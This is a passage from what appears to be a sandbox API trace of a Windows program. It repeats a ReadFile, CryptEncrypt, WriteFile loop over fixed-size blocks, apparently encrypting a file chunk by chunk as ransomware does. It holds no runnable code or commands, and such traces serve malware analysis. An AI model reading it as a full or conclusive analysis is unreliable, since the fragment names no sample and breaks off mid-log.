lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.584] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380) returned 1 [0265.584] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.584] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.584] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380) returned 1 [0265.584] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.584] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.584] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380) returned 1 [0265.584] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.584] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.585] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380) returned 1 [0265.585] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.585] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.585] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380) returned 1 [0265.585] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.585] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.585] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380) returned 1 [0265.585] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.585] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.585] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380) returned 1 [0265.585] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.585] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.585] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380) returned 1 [0265.585] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.586] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.586] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380) returned 1 [0265.586] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.586] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.586] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380) returned 1 [0265.586] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.586] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.586] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380) returned 1 [0265.586] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.586] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.586] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380) returned 1 [0265.586] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.586] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.587] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380) returned 1 [0265.587] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.587] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.587] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380) returned 1 [0265.587] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.587] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.587] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380) returned 1 [0265.587] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.587] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.587] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380) returned 1 [0265.587] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.587] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.587] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380) returned 1 [0265.587] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.588] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.588] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380) returned 1 [0265.588] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.588] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.588] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380) returned 1 [0265.588] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.589] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.589] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380) returned 1 [0265.589] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.589] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.589] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380) returned 1 [0265.589] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.589] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.589] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380) returned 1 [0265.589] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.589] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.589] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380) returned 1 [0265.589] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.590] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.590] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380) returned 1 [0265.590] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.590] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.590] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380) returned 1 [0265.590] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.590] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.590] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380) returned 1 [0265.590] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.590] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.590] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380) returned 1 [0265.590] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.590] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.590] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380) returned 1 [0265.591] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.591] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.591] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380) returned 1 [0265.591] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.591] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.591] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380) returned 1 [0265.591] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.591] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.591] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380) returned 1 [0265.591] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.591] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.591] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380) returned 1 [0265.591] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.592] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.592] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380) returned 1 [0265.592] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.592] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.592] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380) returned 1 [0265.592] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.592] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.592] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380) returned 1 